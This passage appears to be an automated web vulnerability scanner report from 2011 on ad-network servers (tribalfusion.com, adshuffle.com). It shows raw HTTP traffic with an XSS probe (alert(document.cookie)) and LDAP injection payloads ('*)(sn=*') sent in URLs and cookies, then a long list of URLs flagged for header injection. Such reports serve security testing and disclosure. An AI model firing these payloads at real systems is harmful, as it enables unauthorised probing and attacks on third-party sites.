GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=*)!(sn=*&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=asn7TwxZduBwoApTorMUjYrtQJqXsQZaZb6fZbVxooyK1mQOFIJFMXPVMoxcmDomur8rVZdZdyuy0WcfT1gSx9ZaZcvbZbSMD8ZaDH4CZc0gemFHZa4ibQGZawTwQBjZaM05ZacZcPw9sA89iu4sOmJsj3AX3xNW7ogh9VBldCQSLiwHFZaa1ksHfZbnmc2QgtZbP36b3C0xQlrZalAF9IySBoJJbAXZaJrOiLFrV2h7GMSTtTpxUCb4kd1fwSusC7UkKvBAMrFymrEHddhZbdyMpWZdSK7bLZbIj74P9KSZcS5WSOgEW1h5bNpZdPjbwZcl4MFsxyCveZab9x3J77y7UcewXUsfYoJrZcllORGe4MZcgRYw5grLDHgl2g3uXZbr1piQSvtqlMY; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:02 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 389

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/apmM7ioTfIYrJdUdrPm6fInGnspdQH5EMi2Wir3A7ZcnrUKXVfTYVv40cvwpT7T5bvRWUZbEUPjTPTrYPcrtStZbr1dvrT6rM4GvUYrFIVmqm5AZb8Q67E2dQO0W3DnWau4PrS3sb7UsU7UVBgSmrvWdFcqhLZcyI/http://www.clintonbushhaitifund.org/"><img src="http://cdn5.tribalfusion.com/media/1990046.jpeg" border=0 height=60 width=468 ><\/a><\/center>');

2.2. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt [NSC_betivggmf-opef cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Issue detail

The NSC_betivggmf-opef cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the NSC_betivggmf-opef cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=*)(sn=*;

Response 1

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:17 GMT
Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=e5eec554-859a-4200-be95-bc9bf84cd684; domain=.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:17 GMT
Content-Length: 229
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150945525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:17 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">here</a>.</h2>
</body></html>

Request 2

Response 2

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:17 GMT
Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:17 GMT
Content-Length: 229
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150245525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:17 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">here</a>.</h2>
</body></html>

3. HTTP header injection previous next
There are 144 instances of this issue:

http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter]
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [ord parameter]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [ord parameter]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 3]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 4]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 5]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [a parameter]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcc parameter]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcn parameter]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcp parameter]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [vehicle parameter]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]
